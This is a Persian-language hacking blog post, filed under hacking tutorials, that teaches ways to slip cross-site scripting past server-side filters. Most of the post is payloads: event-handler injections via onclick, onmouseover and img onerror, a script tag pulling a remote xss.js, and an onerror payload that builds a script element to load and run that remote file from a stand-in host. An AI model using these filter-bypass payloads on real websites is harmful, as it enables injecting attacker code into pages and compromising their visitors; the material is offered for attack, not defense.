تبلیغات
ناگفته های دنیای سایبری - xss fil ter bypassing new methods
 
درباره وبلاگ


ناگفته های دنیای سایبری ناگفته هایی هست از چیزاهایی که شما از آن بی خبرید،از چیزهایی که شما در روی پرده می بینید و از پشت پرده غافلید:)

اینجا باهم تو این وبلاگ با هم بررسی میکنیم،می بینید که چه چیزی در دنیای سایبری جهان در حال گردش است.

آخرین رویداد های دنیای سایبری ،با ما باشید///

مدیر وبلاگ : 3V!L S}{@D0W™
نویسندگان
نظرسنجی
بیشتر از چه مطلبی استفاده کنیم؟










آمار وبلاگ
  • کل بازدید :
  • بازدید امروز :
  • بازدید دیروز :
  • بازدید این ماه :
  • بازدید ماه قبل :
  • تعداد نویسندگان :
  • تعداد کل پست ها :
  • آخرین بازدید :
  • آخرین بروز رسانی :


ناگفته های دنیای سایبری
You Are In Our ShadoW,So You Are Safe
صفحه نخست             تماس با مدیر           پست الکترونیک               RSS                  ATOM
دوشنبه 26 تیر 1391 :: نویسنده : 3V!L S}{@D0W™
قضیه از این قراره که خیلی واقتا سرور کلماتی رو مثل تگ ها و ... فیلتر میکنه ؛ولی چند تا روش هست که کلمه ی خاصی نداره که بخواد فیلتر بشه ...

<input type=submit onclick="alert(0);" />



<input type=submit onmouseover="alert(0);" />

fبه جای onclick و onmouceover میتونید هر رویداد دیگه ای استفاده کنید:

<img src="salam" onerror="alert(0);" />

رویداد onerror هم خیلی کم پیش میاد که بسته باشه ...
چند مورد دیگه هم هست ،الان یادم نیست ... بعد اضافه میکنم ...

ممکنه شما بخواهید دستوری رو بزنید ... ولی فیلتر باشه ... در این صورت میتونید دستور رو تو یه فایل js. ذخیره کنید ،و با این کد:

<script src="http://www.example.com/xss.js" ></script>

اونو تو صفحه قرار بدید ... اما اگه <script> بسته باشه چی؟
اونوقت میشه با این روش یک فایل js. رو اجرا کرد:
var e=document.createElement("script");
e.src="http://www.example.com/xss.js";
document.getElementsByTagName("head")[0].appendChild(e)


مثال:
<IMG SRC="hey" onerror='var e=document.createElement("script");e.src="http://www.example.com/xss.js"; document.getElementsByTagName("head")[0].appendChild(e);' />






نوع مطلب : مقالات آموزشی، آموزش هکینگ، 
برچسب ها : xss، بایپس، baypass، new method، روش جدید،
لینک های مرتبط : منبع،


 
لبخندناراحتچشمک
نیشخندبغلسوال
قلبخجالتزبان
ماچتعجبعصبانی
عینکشیطانگریه
خندهقهقههخداحافظ
سبزقهرهورا
دستگلتفکر
نظرات پس از تایید نشان داده خواهند شد.